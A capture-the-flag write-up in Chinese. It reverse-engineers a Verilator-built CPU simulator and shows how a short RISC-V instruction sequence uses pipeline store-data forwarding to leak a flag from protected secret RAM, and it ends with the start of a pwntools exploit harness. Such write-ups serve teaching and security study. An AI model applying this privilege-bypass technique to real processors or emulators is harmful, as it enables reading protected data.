ACPU

这题的 Simulation 是一个小型 CPU 的仿真程序:题目用 Verilator 把 SystemVerilog 设计转成 C++,再编译成二进制模拟器。

先看懂其中核心函数逻辑:

函数:main

int main(int argc, char **argv) {
    VerilatedContext *ctx = new VerilatedContext();
    ctx->commandArgs(argc, argv);

    VCPU *cpu = new VCPU(ctx, "Simulation");

    // Verilator 的主循环:不断推进一个时隙,直到没有挂起事件。
    while (!ctx->gotFinish()) {
        cpu->eval_step();
        if (cpu->eventsPending()) {
            ctx->time(cpu->nextTimeSlot());
        }
    }

    delete cpu;
    delete ctx;
    return 0;
}

函数:VCPU___024root___eval_initial__TOP(读取输入文件并初始化 cache/RAM 状态)

// Initial-block evaluation: loads the two memory images from disk and clears
// the public cache lines.
// NOTE(review): the VL_READMEM_N arguments are presumably
// (hex format, word width in bits, depth in words, file name, destination)
// -- confirm against the Verilator headers.
void eval_initial_top(Root *root) {
    // "rom_file.mem" -> root->mem_array_0x368 (32-bit words, depth 0x800).
    VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368);
    // "flag.mem" -> root->mem_array_0x63e8 (32-bit words, depth 0x100).
    VL_READMEM_N(true, 32, 0x100, "flag.mem", root->mem_array_0x63e8);
    // Zero the whole public_cache_lines array.
    memset(root->public_cache_lines, 0, sizeof(root->public_cache_lines));
}

函数:VCPU___024root___nba_sequent__TOP__0(题目核心处理逻辑)

// One pipeline-stage record. step_core_logic maps seven of these (p0..p6)
// onto root at offsets 0x018, 0x070, ... 0x228, i.e. 0x58 bytes apart.
// The trailing comments are the reconstructed byte offsets inside a record.
//
// NOTE(review): with natural alignment the fields listed here end at 0x50,
// while the stage stride is 0x58 and the section-10 comment in
// step_core_logic places p5.wback/rd/wdata/sys_* 8 bytes higher than
// annotated below (e.g. wback at +0x40, wdata at +0x48). The layout from
// roughly +0x34 onward should be re-checked against the binary.
struct Signals {
    uint32_t pc;          // +0x00
    uint32_t insn;        // +0x04
    uint8_t  privileged;  // +0x08
    uint8_t  bad_inst;    // +0x09
    uint8_t  rs1;         // +0x0a
    uint8_t  rs2;         // +0x0b
    uint32_t reg1;        // +0x0c
    uint32_t reg2;        // +0x10
    uint32_t op;          // +0x14
    uint32_t imm;         // +0x18
    uint32_t asel;        // +0x1c
    uint32_t bsel;        // +0x20
    uint32_t selector;    // +0x24
    uint8_t  pcsel;       // +0x28
    uint8_t  flag_zero;   // +0x29
    uint8_t  flag_carry;  // +0x2a
    uint8_t  cond;        // +0x2b
    uint32_t jimm;        // +0x2c
    uint8_t  branch;      // +0x30
    uint8_t  memr;        // +0x31
    uint8_t  memw;        // +0x32
    uint32_t memt;        // +0x34
    uint8_t  wback;       // +0x38
    uint8_t  rd;          // +0x39
    uint64_t wdata;       // +0x40
    uint8_t  sys_wback;   // +0x48
    uint16_t sys_wreg;    // +0x4a
    uint32_t sys_wdata;   // +0x4c
}; // size = 0x58 (stride between stage records; see NOTE above)

// Sign-extend the low 8 bits of x to 32 bits.
static inline uint32_t sext8(uint32_t x)  { return (uint32_t)(int32_t)(int8_t)x; }
// Sign-extend the low 16 bits of x to 32 bits.
static inline uint32_t sext16(uint32_t x) { return (uint32_t)(int32_t)(int16_t)x; }

// Turn a raw 32-bit memory word into the value a load returns.
//   raw   - the word read from memory
//   memt  - load type: 0 = LB, 1 = LH, 2 = LW, 3 = LBU, 4 = LHU
//   shift - bit offset of the addressed byte/half inside the word
// Returns the selected lane, sign- or zero-extended according to memt;
// any other memt yields 0.
static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
    // Shifting a 32-bit value by 32 or more is undefined behaviour in C.
    // Such a shift selects nothing inside the word, so treat it as 0.
    uint32_t v = (shift < 32) ? (raw >> shift) : 0;
    switch (memt) {
    case 0: return sext8(v);        // LB
    case 1: return sext16(v);       // LH
    case 2: return v;               // LW
    case 3: return v & 0xff;        // LBU
    case 4: return v & 0xffff;      // LHU
    default: return 0;
    }
}

// Overwrite one 8-bit lane of the 32-bit word mem[idx].
//   mem   - word array to modify
//   idx   - index of the word inside mem (not range-checked here)
//   shift - bit position of the lane's least significant bit
//   value - byte to store in that lane
// A shift of 32 or more addresses no bit of a 32-bit word, and shifting by
// at least the operand width is undefined behaviour in C, so the word is
// left untouched in that case.
static inline void write_byte_lane(uint32_t *mem, uint32_t idx, uint8_t shift, uint8_t value) {
    if (shift >= 32) {
        return;
    }
    uint32_t mask = ~(0xffu << shift);
    mem[idx] = (mem[idx] & mask) | ((uint32_t)value << shift);
}

// ALU result selection. The individual cases are add / sub / xor / or / not /
// shifts / slt / sltu. Shift amounts come from the low 5 bits of a; every
// result is a 32-bit value zero-extended to 64 bits, and an unlisted op
// yields 0.
static inline uint64_t execute_selector_result(uint32_t op, uint32_t a, uint32_t b) {
    const uint32_t amount = a & 0x1f;
    uint32_t value = 0;

    if (op == 0) {
        value = a + b;
    } else if (op == 1) {
        value = a - b;
    } else if (op == 2) {
        value = a ^ b;
    } else if (op == 3) {
        value = a | b;
    } else if (op == 4) {
        value = ~b;
    } else if (op == 5) {
        value = b << amount;
    } else if (op == 8) {
        value = b >> amount;
    } else if (op == 9) {
        // Right shift of b as a signed value.
        value = (uint32_t)(((int32_t)b) >> amount);
    } else if (op == 10) {
        // Signed comparison b < a.
        value = ((int32_t)b < (int32_t)a) ? 1 : 0;
    } else if (op == 11) {
        // Unsigned comparison b < a.
        value = (b < a) ? 1 : 0;
    }

    return (uint64_t)value;
}

// Front-end decode unit of the CPU: it translates the fetched instruction
// into pipeline signals. The real logic is too complex to reproduce, so this
// placeholder only documents its role and its input/output boundary.
static inline void decode_frontend_and_build_controls(
    void *root,
    Signals &p0,
    Signals &p1,
    Signals &p2,
    Signals &p3,
    Signals &p4,
    uint32_t fetched_insn,
    uint64_t fetched_pc_and_insn)
{
    // What the real function does:
    // 1. Derives rs1/rs2/imm/jimm/selector/op/memt/wback/rd/sys_* from
    //    p3 / p4 / the current fetched_insn.
    // 2. Maintains the control bits at
    //    root+0x280/0x281/0x28d/0x28e/0x28f/0x290/0x291.
    // 3. Maintains the front-end / immediate scratch slots at
    //    root+0x314/0x318/0x31c.
    //
    // Only the true input/output boundary is kept here; every argument is
    // deliberately left unused.
    (void)root;
    (void)p0;
    (void)p1;
    (void)p2;
    (void)p3;
    (void)p4;
    (void)fetched_insn;
    (void)fetched_pc_and_insn;
}

// One evaluation step of the reconstructed core logic.
//
// The seven pipeline-stage records p0..p6 live at fixed offsets inside root
// (0x018 .. 0x228, 0x58 bytes apart). The function works on local copies
// (next_p*), computes the memory-access, fetch, execute and write-back
// effects for this step, and stores everything back at commit_all.
void step_core_logic(Root *root) {
    // Views of the current stage records inside root.
    Signals &p0 = *(Signals *)((char *)root + 0x018);
    Signals &p1 = *(Signals *)((char *)root + 0x070);
    Signals &p2 = *(Signals *)((char *)root + 0x0c8);
    Signals &p3 = *(Signals *)((char *)root + 0x120);
    Signals &p4 = *(Signals *)((char *)root + 0x178);
    Signals &p5 = *(Signals *)((char *)root + 0x1d0);
    Signals &p6 = *(Signals *)((char *)root + 0x228);

    // Next-state copies; they are written back only at commit_all.
    Signals next_p0 = p0;
    Signals next_p1 = p1;
    Signals next_p2 = p2;
    Signals next_p3 = p3;
    Signals next_p4 = p4;
    Signals next_p5 = p5;
    Signals next_p6 = p6;

    uint32_t next_fetch_pc = root->field_0x320;
    uint8_t next_delay_a = root->byte_0x294;
    uint8_t next_delay_b = root->byte_0x293;

    // Per-step classification of the memory access.
    // NOTE(review): miss_active and public_miss are never assigned after
    // this initialization, so section 13 always stores false for them.
    bool secret_access = false;
    bool public_access = false;
    bool illegal_load = false;
    bool illegal_store = false;
    bool cache_hit = false;
    bool public_fill_line = false;
    bool miss_active = false;
    bool public_miss = false;

    // Deferred write requests; the actual stores happen in section 6.
    bool take_secret_write = false;
    bool take_public_byte_write = false;
    bool take_public_half_write = false;
    bool take_public_word_write = false;

    uint32_t raw_mem_word = 0;
    uint32_t selected_public_word = 0;
    uint32_t public_line_base = 0;
    uint32_t public_word_index = 0;

    uint16_t secret_index = 0;
    uint16_t public_index_byte = 0;
    uint16_t public_index_half = 0;
    uint16_t public_index_word = 0;
    uint8_t public_byte_shift = 0;
    uint8_t public_half_shift = 0;
    uint8_t public_word_shift = 0;
    uint8_t public_byte_value = 0;
    uint8_t public_half_value = 0;
    uint8_t public_word_value = 0;

    // ----------------------------------------------------------------
    // 1. reset / power-on path
    // ----------------------------------------------------------------
    if (root->byte_0x14) {
        root->field_0x32c = 0x20;
        root->field_0x350 = 0x1000000010ULL;
        root->field_0x308 = 0;

        memset((char *)root + 0x2368, 0, 0x60);
        memset((char *)root + 0x27740, 0, 0x80);
        memset((char *)root + 0x277c0, 0, 0x40);
        memset((char *)root + 0x27810, 0, 0x3e0);

        // Clear every stage record.
        next_p0 = {};
        next_p1 = {};
        next_p2 = {};
        next_p3 = {};
        next_p4 = {};
        next_p5 = {};
        next_p6 = {};
        // Section 5 only fetches a new instruction while p0.memt == 4.
        next_p0.memt = 4;

        root->field_0x340 = 0;
        root->field_0x34c = 0;
        root->byte_0x28f = 0;
        root->byte_0x290 = 0;
        root->byte_0x291 = 0;
        root->byte_0x292 = 0;
        // Skip the normal step entirely; only the commit below runs.
        goto commit_all;
    }

    // ----------------------------------------------------------------
    // 2. Snapshot of the line from the previous step's public fill
    // ----------------------------------------------------------------
    // byte_0x291 holds public_fill_line as stored by section 13 of the
    // previous step.
    // NOTE(review): root+0x70 is also the offset p1 is mapped to above --
    // confirm that this copy/clear really targets that location.
    if (root->byte_0x291) {
        root->field_0x354 = 0x10;
        public_line_base = (uint32_t)(root->qword_0x1c0 >> 10);
        public_word_index = (uint32_t)((root->qword_0x1c0 >> 6) & 0xf);
        memcpy((char *)root + 0x70, (char *)root + 0x27740, 0x40);
        public_fill_line = true;
    } else {
        memset((char *)root + 0x70, 0, 0x40);
        public_fill_line = false;
    }

    // ----------------------------------------------------------------
    // 3. Advance PC / cycle counter / delay state
    // ----------------------------------------------------------------
    // Bit 0 of byte_0x13 gates both the PC update here and the fetch in
    // section 5 (presumably a stall bit -- TODO confirm).
    if ((root->byte_0x13 & 1) == 0) {
        next_fetch_pc += 4;
        // byte_0x1f8 / field_0x204 are written in section 11 from the
        // branch_taken / branch_target temporaries.
        if (root->byte_0x1f8) {
            next_fetch_pc = root->field_0x204;
        }
    }
    root->field_0x308++;

    if (root->byte_0x295) {
        next_delay_a = 2;
        next_delay_b = 1;
    } else if (next_delay_b) {
        if (next_delay_a) next_delay_a = (next_delay_a - 1) & 3;
        else next_delay_b = 0;
    }

    // ----------------------------------------------------------------
    // 4. Route the memory access to the public or the secret region
    // ----------------------------------------------------------------
    {
        // The top two address bits select the region: 0 = public, 2 = secret.
        uint32_t addr = (uint32_t)root->qword_0x1c0;
        uint32_t region = addr >> 30;

        // Proceed only if at least one request bit is enabled and not masked.
        if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
            if (region == 0) {
                public_access = true;

                // Bits 1..3 of byte_0x28d each request one lane write.
                if (root->byte_0x28d & 0x2) {
                    public_byte_shift = 8;
                    public_index_byte = (addr >> 2);
                    public_byte_value = (uint8_t)(root->store_word >> 8);
                    if (public_index_byte <= 0x83d5) take_public_byte_write = true;
                }
                if (root->byte_0x28d & 0x4) {
                    public_half_shift = 16;
                    public_index_half = (addr >> 2);
                    public_half_value = (uint8_t)(root->store_word >> 16);
                    if (public_index_half <= 0x83d5) take_public_half_write = true;
                }
                // NOTE(review): this lane takes both its shift and its value
                // from address bits 24..31 rather than from store_word,
                // unlike the two lanes above -- confirm against the binary.
                if (root->byte_0x28d & 0x8) {
                    public_word_shift = (addr >> 24) & 0xff;
                    public_index_word = (addr >> 2) & 0xffff;
                    public_word_value = public_word_shift;
                    if (public_index_word <= 0x83d5) take_public_word_write = true;
                }

                if (root->load_enable_from_stage4) {
                    // Address bits 6..9 pick one of 16 lines; bits 10 and up
                    // are the tag.
                    uint8_t line = (addr >> 6) & 0xf;
                    uint32_t line_tag = addr >> 10;

                    cache_hit =
                        (root->public_cache_tag[line] == line_tag) &&
                        root->public_cache_valid[line];

                    root->byte_0x292 = cache_hit;

                    // On a hit the word comes from the cache data array,
                    // otherwise straight from public memory.
                    if (cache_hit) {
                        selected_public_word = root->public_cache_data_0x27810[(line << 4) + ((addr >> 2) & 0xf)];
                    } else {
                        selected_public_word = root->public_mem_0x67e8[addr >> 2];
                    }

                    root->field_0x348 = selected_public_word;
                }
            } else if (region == 2) {
                secret_access = true;
                // Word index within the 64-word secret array.
                secret_index = (addr >> 2) & 0x3f;

                // The secret word is read and latched before any
                // legality check is evaluated.
                raw_mem_word = root->secret_mem_0x63e8[secret_index];
                root->field_0x340 = raw_mem_word;

                // byte_0x290 is the secret_access value stored by section 13
                // of the previous step.
                // NOTE(review): the exact meaning of this bit (permission
                // vs. "previous step was a secret access") should be
                // confirmed against the binary.
                illegal_load  = root->load_enable_from_stage4  && !root->byte_0x290;
                illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;

                if (root->secret_store_enable && !illegal_store) {
                    take_secret_write = true;
                }
            }
        }

        // For the public region the raw word is always taken from
        // field_0x348, even when no request was accepted in this step.
        if (region == 0) {
            raw_mem_word = root->field_0x348;
            root->field_0x340 = raw_mem_word;
        }

        // Format the latched word according to p4's load type and byte_0x28e.
        root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
        // An illegal load only raises a flag here; the data computed above
        // is left in place.
        if (illegal_load) root->byte_0x231 = 1;
    }

    // ----------------------------------------------------------------
    // 5. Instruction fetch
    // ----------------------------------------------------------------
    if ((p0.memt != 4) || p0.bad_inst) {
        // Put 0x13 into the upper 32 bits (presumably the RISC-V NOP
        // encoding `addi x0, x0, 0` in the instruction half -- TODO confirm).
        root->field_0x30c = (uint64_t)0x13 << 32;
    } else if ((root->byte_0x13 & 1) == 0) {
        root->field_0x30c = next_fetch_pc;
        // The ROM is indexed by word and wraps at 0x800 words.
        root->field_0x310 = root->rom_words_0x368[(next_fetch_pc >> 2) & 0x7ff];
    }

    // ----------------------------------------------------------------
    // 6. Public fill / RAM write side effects
    // ----------------------------------------------------------------
    if (public_fill_line) {
        uint8_t line = ((uint32_t)root->qword_0x1c0 >> 6) & 0xf;
        root->public_cache_valid[line] = 1;
        root->public_cache_tag[line] = public_line_base;
    }

    // Perform the writes that section 4 only flagged.
    if (take_secret_write) {
        root->secret_mem_0x63e8[secret_index] = root->secret_store_value;
    }
    if (take_public_byte_write) {
        write_byte_lane(root->public_mem_0x67e8, public_index_byte, public_byte_shift, public_byte_value);
    }
    if (take_public_half_write) {
        write_byte_lane(root->public_mem_0x67e8, public_index_half, public_half_shift, public_half_value);
    }
    if (take_public_word_write) {
        write_byte_lane(root->public_mem_0x67e8, public_index_word, public_word_shift, public_word_value);
    }

    // ----------------------------------------------------------------
    // 7. Front-end decode / immediates / control-signal generation
    // ----------------------------------------------------------------
    decode_frontend_and_build_controls(
        root, next_p0, next_p1, next_p2, next_p3, next_p4,
        root->field_0x310, root->field_0x30c);

    // ----------------------------------------------------------------
    // 8. Advance p1 -> p2 and patch in reg1 / imm
    // ----------------------------------------------------------------
    next_p2 = p1;
    next_p2.reg1 = root->field_0x314;
    next_p2.imm  = root->field_0x31c;

    // ----------------------------------------------------------------
    // 9. ALU / execute result
    // ----------------------------------------------------------------
    root->field_0x360 = execute_selector_result(p3.op, p3.reg1, p3.reg2);

    // ----------------------------------------------------------------
    // 10. Write p3's execute result into p5
    // root+0x210/0x211/0x218/0x220/0x222/0x224 are
    // p5.{wback,rd,wdata,sys_wback,sys_wreg,sys_wdata}
    // ----------------------------------------------------------------
    {
        uint64_t exec64 = root->field_0x360;
        uint32_t exec32 = (uint32_t)exec64;
        // Low byte of the upper 32 bits of the execute result.
        uint8_t exec_hi = (uint32_t)(exec64 >> 32);

        next_p5.rd = root->exec_rd_temp;
        next_p5.wdata = exec64;

        if (p3.sys_wback) {
            // For a system write-back the register write-back flag is set
            // only when the 32-bit execute result is zero.
            next_p5.wback = (exec32 == 0);
            next_p5.sys_wback = 1;
            next_p5.sys_wreg = p3.imm & 0xfff;
            next_p5.sys_wdata = root->exec_sys_value;
        } else {
            next_p5.wback = (p3.wback & 1);
            next_p5.sys_wback = 0;
            next_p5.sys_wreg = 0;
            next_p5.sys_wdata = 0;
        }

        root->byte_0x28b = (exec32 == 0);
        root->byte_0x28c = exec_hi;
        root->byte_0x284 = root->cmp_result_kind;
    }

    // ----------------------------------------------------------------
    // 11. Advance p4 -> p6
    // ----------------------------------------------------------------
    next_p6 = p4;
    root->field_0x204 = root->branch_target_temp;
    root->byte_0x1f8 = root->branch_taken_temp;
    root->byte_0x1f9 = root->branch_zero_temp;
    root->byte_0x1fa = root->branch_carry_temp;

    // ----------------------------------------------------------------
    // 12. The crucial tail: the load result is written into p6.wdata
    // ----------------------------------------------------------------
    next_p6.wdata = root->field_0x34c;

    // illegal_load does not stop the data from entering p6.wdata;
    // what it blocks is the final write-back.
    if (root->byte_0x28f || root->late_kill_flag) {
        next_p6.wback = 0;
    }

    // secret_access / late kill clears the destination register.
    if (root->byte_0x290 || root->late_kill_flag) {
        next_p6.rd = 0;
    }

    // A side flag is cleared along the way as well.
    if (root->byte_0x28f || root->late_kill_flag) {
        root->byte_0x268 = 0;
    }

    // ----------------------------------------------------------------
    // 13. Store the externally observable state
    // ----------------------------------------------------------------
    root->byte_0x290 = secret_access;
    root->byte_0x291 = public_fill_line;
    root->byte_0x292 = cache_hit;
    root->byte_illegal_load = illegal_load;
    root->byte_illegal_store = illegal_store;
    root->byte_public_access = public_access;
    root->byte_miss_active = miss_active;
    root->byte_public_miss = public_miss;
    root->field_public_line_base = public_line_base;
    root->field_public_word_index = public_word_index;

commit_all:
    // ----------------------------------------------------------------
    // 14. Commit everything back into root
    // ----------------------------------------------------------------
    p0 = next_p0;
    p1 = next_p1;
    p2 = next_p2;
    p3 = next_p3;
    p4 = next_p4;
    p5 = next_p5;
    p6 = next_p6;

    root->field_0x320 = next_fetch_pc;
    root->byte_0x294 = next_delay_a;
    root->byte_0x293 = next_delay_b;
}

这题外层 run.py 的逻辑是:把用户输入的 base64 内容解码后,从 rom_file.mem 的 0x100 位置开始写入(最大长度为 0x800),再把 flag.txt 的内容存入 flag.mem,最后运行 Simulation。

从 VCPU___024root___eval_initial__TOP 里可以看到,初始化时会做两件事:一是把 flag.mem 读进 root + 0x63e8 处的数组(在 VCPU___024root___nba_sequent__TOP__0 里对应 secret_mem_0x63e8);二是把 rom_file.mem 读进 root->mem_array_0x368(在 VCPU___024root___nba_sequent__TOP__0 里对应 rom_words_0x368)。

也就是flag被存在Secret RAM里,我们要想办法从里面读取数据。

所以我们先看VCPU___024root___nba_sequent__TOP__0里的读取逻辑,也就是"4.public / secret 访存分流"那部分

    // ----------------------------------------------------------------
    // 4. public / secret 访存分流
    // ----------------------------------------------------------------
    {
        uint32_t addr = (uint32_t)root->qword_0x1c0;
        uint32_t region = addr >> 30;

        if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
            ......
            else if (region == 2) {
                secret_access = true;
                secret_index = (addr >> 2) & 0x3f;

                raw_mem_word = root->secret_mem_0x63e8[secret_index];
                root->field_0x340 = raw_mem_word;

                illegal_load  = root->load_enable_from_stage4  && !root->byte_0x290;
                illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;

                if (root->secret_store_enable && !illegal_store) {
                    take_secret_write = true;
                }
            }
        }
        root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
        if (illegal_load) root->byte_0x231 = 1;
    }

if ((~root->mem_req_mask) & root->mem_req_enable)

  • root->mem_req_enable → 内存请求有效位(load/store 请求是否发出)
  • root->mem_req_mask → 内存请求屏蔽位(屏蔽某些请求)
  • ~root->mem_req_mask → 取反,得到允许的 bit 位
  • 条件成立:
    • 同时满足:请求有效,并且没有被屏蔽

uint32_t addr = (uint32_t)root->qword_0x1c0;

取出这次访存地址

uint32_t region = addr >> 30; if (region == 2)

这里是用地址高位判断访问区域:

  • region == 0:public 区
  • region == 2:secret 区

secret_index = (addr >> 2) & 0x3f;

  • 地址先右移 2 位,代表按 word 访问(因为 CPU 内存是按 word(32-bit)对齐访问的,一个 word = 4 字节,所以地址右移 2 位,就把 byte 地址转换成了 word 地址)
  • 再取低 6 位,说明secret 区一共按64 个word 编址(索引范围 0~63)

raw_mem_word = root->secret_mem_0x63e8[secret_index];

  • 按刚算出来的 secret_index
  • 从 secret_mem_0x63e8 里读一个 32-bit word
  • 放进 raw_mem_word

这一步已经把 secret RAM 的内容取出来了

root->field_0x340 = raw_mem_word;

把 secret RAM 的内容转移到 root->field_0x340

illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;

这句是在判断:这次 secret 访问是不是非法的 load。

  • root->load_enable_from_stage4
    表示当前这拍的这次 secret 访存,其实是一个 load
  • !root->byte_0x290
    表示当前不具备访问 secret 的权限

所以这句的含义就是:如果当前是在做一次 load,而且当前没有 secret 权限,那么这次就是 illegal load。

illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;

这句和上一句完全类似,只不过它判断的是:这次 secret 访问是不是非法的 store。

也就是:

  • 如果这次是 store
  • 并且没有 secret 权限
  • 那就把 illegal_store 置真

if (root->secret_store_enable && !illegal_store) {

意思是:

  • 如果当前这次操作本来就打算往 secret RAM 写
  • 并且这次写不是非法的

那就允许它进入真正的写回阶段。

take_secret_write = true;

这句不是立刻写 RAM,意思是:

  • 先记一个“待写回”的标志
  • 稍后在统一提交阶段,才真正把值写进 secret_mem_0x63e8

root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);

意思是:

  • 不管前面 raw_mem_word 是从 public 还是 secret 来的
  • 现在都统一拿 root->field_0x340
  • 根据 load 类型 p4.memt
  • 再根据字内偏移 root->byte_0x28e
  • 生成最终的 load 结果
  • 存进 root->field_0x34c

也就是:

  • 0x340 是原始 32-bit word
  • 0x34c 是 CPU 真正整理好的 load 返回值

if (illegal_load) root->byte_0x231 = 1;

这句是在记录一个异常/违规标志。

意思是:

  • 如果刚才判定这是一次非法 load
  • 就把 root->byte_0x231 置 1

也就是给后面的异常处理/kill 逻辑打一个标记:这拍发生了 illegal load。

我们现在看 extract_load_result()是怎么处理的:

static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
    uint32_t v = raw >> shift;
    switch (memt) {
    case 0: return sext8(v);        // LB
    case 1: return sext16(v);       // LH
    case 2: return v;               // LW
    case 3: return v & 0xff;        // LBU
    case 4: return v & 0xffff;      // LHU
    default: return 0;
    }
}

第一步:

uint32_t v = raw >> shift;

这一步是在做“字内选字节/半字”。

比如一个 raw_mem_word 是:

[b3 b2 b1 b0]

如果:

  • shift = 0,取最低字节开始
  • shift = 8,相当于把第二个字节移到最低位
  • shift = 16,取第三个字节
  • shift = 24,取第四个字节

所以它是在从一个 32-bit word 里抽真正要load的那一部分。

第二步:按 load 类型解释
memt 决定这是哪种 load:

  • 0 -> LB
  • 1 -> LH
  • 2 -> LW
  • 3 -> LBU
  • 4 -> LHU

对应行为:

case 0: return sext8(v);

取低 8 位,并做符号扩展

case 1: return sext16(v);

取低 16 位,并做符号扩展

case 2: return v;

直接返回 32 位 word

case 3: return v & 0xff;

取低 8 位,但不符号扩展

case 4: return v & 0xffff;

取低 16 位,但不符号扩展

所以如果题目用的是 lw,那这一层几乎没有损失。

我们继续追踪field_0x34c:

    // ----------------------------------------------------------------
    // 12. 关键后半段:load 结果写进 p6.wdata
    // ----------------------------------------------------------------
    next_p6.wdata = root->field_0x34c;

    // illegal_load 不会阻止数据进入 p6.wdata;
    // 它拦的是最终写回
    if (root->byte_0x28f || root->late_kill_flag) {
        next_p6.wback = 0;
    }

    // secret_access / late kill 会把目的寄存器清掉
    if (root->byte_0x290 || root->late_kill_flag) {
        next_p6.rd = 0;
    }

    // 还会顺手清一组 side flag
    if (root->byte_0x28f || root->late_kill_flag) {
        root->byte_0x268 = 0;
    }

next_p6.wdata = root->field_0x34c;

意思是:

  • field_0x34c 是整理好的 load 结果
  • 现在它被放进 p6.wdata
  • p6 是最后一级的那组 Signals

也就是说,到这里为止,secret 数据已经不是停留在 memory 子系统里,而是已经进入写回级数据槽了。

if (root->byte_0x28f || root->late_kill_flag) { next_p6.wback = 0; }

意思是:

  • 如果发生了 illegal_load 这类 kill 条件
  • 那就把 p6.wback 清零

wback 是一个是否要写入的标记位,代表最终要不要真的把 wdata 写进寄存器堆,清零就代表:

  • wdata 还在
  • 但“不允许正式提交”

if (root->byte_0x290 || root->late_kill_flag) { next_p6.rd = 0; }

意思是:

  • 如果是 secret 访问或者进入某个 kill 状态
  • 那就把目标寄存器号清成 0

所以这句是在进一步保证:

这次非法得到的 load 结果,不会以“正常寄存器写回”的形式保留下来。

if (root->byte_0x28f || root->late_kill_flag) { root->byte_0x268 = 0; }

条件如上,也是非法时清空,对解题不太重要

我们现在可以总结一下了:

secret RAM的内容可以被读出来存进 p6.wdata,但是最后 wback 被清零,rd 也被抹掉

也就是:

  • 数据路径是通的
  • 只是最终提交被拦了

那下一步该怎么做呢,我们要先了解一下CPU Forwarding:

假设一个简单的 5 级流水线 CPU(Fetch → Decode → Execute → Memory → Writeback),有这样两条指令:

1. add r1, r2, r3   ; r1 = r2 + r3
2. sub r4, r1, r5   ; r4 = r1 - r5
  • 问题:第二条指令需要用到 r1 的值,但 r1 还没写回到寄存器堆(Writeback 阶段还没到)
  • 直接从寄存器堆读会得到旧值 → 数据冒险

Forwarding 的核心思路是:

  • 不用等寄存器写回
  • 直接从 pipeline 中 上一条指令的中间阶段(ALU 输出 / memory 输出) 拿数据给下一条指令

举例:

EX stage of add r1 = ALU_out
EX stage of sub r4 = get r1 from previous EX stage instead of regfile
  • 这样第二条指令就能立即拿到正确的 r1 值,而不需要停顿

Forwarding 的典型路径:

| 来源阶段 | 目的阶段 | 说明 |
| --- | --- | --- |
| EX / MEM | EX | ALU 结果直接给下一条指令的 ALU 使用 |
| MEM | EX | Load 结果给下一条指令 ALU 使用(load-use hazard) |
| MEM / WB | MEM | 写回数据给 memory store 使用 |

我们如果这样操作:

words += li32(5, 0x80000000)
words.append(lw(7, 0, 5))
words.append(sw(7, 0, 0))
words.append(lw(10, 0, 0))
words += li32(6, 0x2000)
words.append(jalr(0, 0, 6))

对应的汇编逻辑是:

li32 t0, 0x80000000
lw   t2, 0(t0)
sw   t2, 0(x0)
lw   a0, 0(x0)
li32 t1, 0x2000
jalr x0, 0(t1)

1. 0x80000000 是什么:

这是 secret 区的基址。

我们前面已经从 step_core_logic 里确认过,访存时会先做:

region = addr >> 30;

然后:

  • region == 0:public 区
  • region == 2:secret 区

而:

0x80000000 >> 30 = 2

因为 0x80000000 的最高两位是 10

所以把地址设成 0x80000000,就是在访问 secret RAM 的第 0 个 word。
也就是 flag 开头那 4 个字节所在的位置。

2. 5、7、10 代表什么:

这些是寄存器编号。

RISC-V 有 32 个通用寄存器:

  • x0 ~ x31

其中一些有 ABI 别名,常用的是:

  • x5 = t0
  • x6 = t1
  • x7 = t2
  • x10 = a0

特殊地,x0 是RISC-V里永远为 0 的寄存器,写进去的值会被丢掉

3.具体流程:

按顺序看:

第一步

li32 t0, 0x80000000

把 t0 设成 secret 基址。

所以:

t0 = 0x80000000

第二步

lw t2, 0(t0)

从 0x80000000 读一个 32-bit word。

这里实际读到的是 flag 的前 4 个字节,也就是:

'A' 'C' 'T' 'F'

按小端拼成 32 位数就是:

0x46544341

但是这次 load 属于非法 secret load,所以:

  • 数据内部其实已经读出来了
  • 可最后不会正常提交到 t2/x7

所以最后可以看到:

x7 = 0x00000000

第三步

sw t2, 0(x0)

它按正常语义是:

*(uint32_t *)0x0 = t2

这里的 t2 不是从寄存器堆里慢慢等出来的,而是 store-data 走了 forwarding。

也就是说:

  • 前一条 lw 虽然没最终写回 x7
  • 但它的结果已经在流水线内部
  • sw 紧跟着来取 store-data 时,直接从 forwarding 拿到了那份 secret word

于是 public 地址 0x0 被写成了:

0x46544341

第四步

lw a0, 0(x0)

这次是从 public 地址 0x0 正常读。

所以它不会触发 secret 权限检查,能合法读回:

x10 = 0x46544341

第五步

li32 t1, 0x2000
jalr x0, 0(t1)

x0无法写入,这里表示不保存返回地址到寄存器,直接跳到 0x2000 正常结束,让模拟器把寄存器打出来,这时候x10里面就是flag的前4字节内容了。

这里 0x2000 这个结束地址可以通过 VCPU___024root___eval_initial__TOP 里的 VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368); 看出来:整个 ROM 的大小为 0x800 * 4 = 0x2000 字节,所以 0x2000 正好是 ROM 末尾之后的第一个地址,大概率就是结束地址,实际测试可以发现确实是。

之后按每次 4 字节循环,依次把 secret RAM 里的每个 word 泄露到不同的寄存器里,就能取完整个 flag。

EXP:

from pwn import *
from zenpwnpy import *
# Exploit harness setup: configures pwntools, reads mode switches from the
# command line and opens the tube `p` used by everything below.
context.terminal = ['tmux', 'splitw', '-h']
# Remote endpoint, only used in 'remote' mode. The last two whitespace/colon
# separated tokens are taken as host and port, so any flag such as --ssl has
# to come before them. With the empty default, 'remote' mode fails on
# parts[-2].
target = ''

file_name = './Simulation'

elf = ELF(file_name)
context.binary = elf
context.gdb_binary = "pwndbg"

# Mode switches, each enabled by a bare word on the command line.
# NOTE(review): `sys` is not imported explicitly here; presumably it comes
# from one of the star imports above -- confirm.
gdb_   = 1 if ('gdb' in sys.argv)        else 0
switch = 1 if ('remote' in sys.argv)     else 0
debug  = 0 if ('deoff'  in sys.argv)     else 1
error  = 1 if ('error'  in sys.argv)     else 0

# Debug logging is on unless 'deoff' is given.
if debug:
    context(log_level='debug')

